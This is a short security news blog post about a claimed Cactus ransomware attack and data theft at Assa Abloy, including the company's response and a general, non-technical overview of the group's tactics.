![Breached [dot] blog](https://breached.blog/wp-content/uploads/2025/03/logo-3.png){kind=logo}
In a recent cyber incident, Assa Abloy, the global leader in access solutions, fell victim to a ransomware attack orchestrated by the Cactus group. The breach resulted in the exfiltration of approximately 229 GB of sensitive data, encompassing confidential corporate strategies, agreements, contracts, personal identifiable information (such as passports, driver’s licenses, contact details, and home addresses of executive management and others), internal documents, audit records, legal data, financials, payroll information, corporate and personal correspondence, and database exports.
Assa Abloy’s Profile
Assa Abloy AB, headquartered in Stockholm, Sweden, is renowned for its innovative access solutions. The company’s offerings include efficient door openings, trusted identities, and entrance automation, aiming to provide safe, secure, and convenient access to both physical and digital spaces. With a reported revenue of $14.4 billion, Assa Abloy holds a dominant position in the global market.
Details of the Attack
The Cactus ransomware group, known for its sophisticated tactics, claimed responsibility for the attack on Assa Abloy. They alleged that 229 GB of data were exfiltrated, threatening to leak the information unless a ransom is paid. This tactic, known as double extortion, not only encrypts the victim’s data but also threatens to expose it publicly, increasing pressure on the victim to comply with ransom demands.
Assa Abloy’s Response
In response to the breach, Assa Abloy’s communications manager, Christiane Belfrage, stated that the incident was caused by a third party and that an internal investigation revealed access to certain data from a few local servers in Sweden, mainly internal information. The company does not believe that it will have any “material financial impact”.
Understanding Cactus Ransomware
Cactus ransomware is a relatively new strain that emerged in March 2023. It typically exploits vulnerabilities in virtual private network (VPN) software to gain initial access to target environments. Once inside, it establishes persistence through SSH backdoors and scheduled tasks, conducts network reconnaissance, and steals user credentials. The ransomware employs a combination of RSA and AES encryption to lock files and uses tools like Rclone to exfiltrate data to cloud storage solutions. Notably, Cactus is known for its double-extortion tactics, where victims are threatened with data leaks in addition to file encryption.
Conclusion
The ransomware attack on Assa Abloy underscores the escalating threats posed by sophisticated cybercriminal groups like Cactus. It highlights the critical importance for organizations to proactively enhance their cybersecurity measures, ensuring robust defenses against such malicious activities.
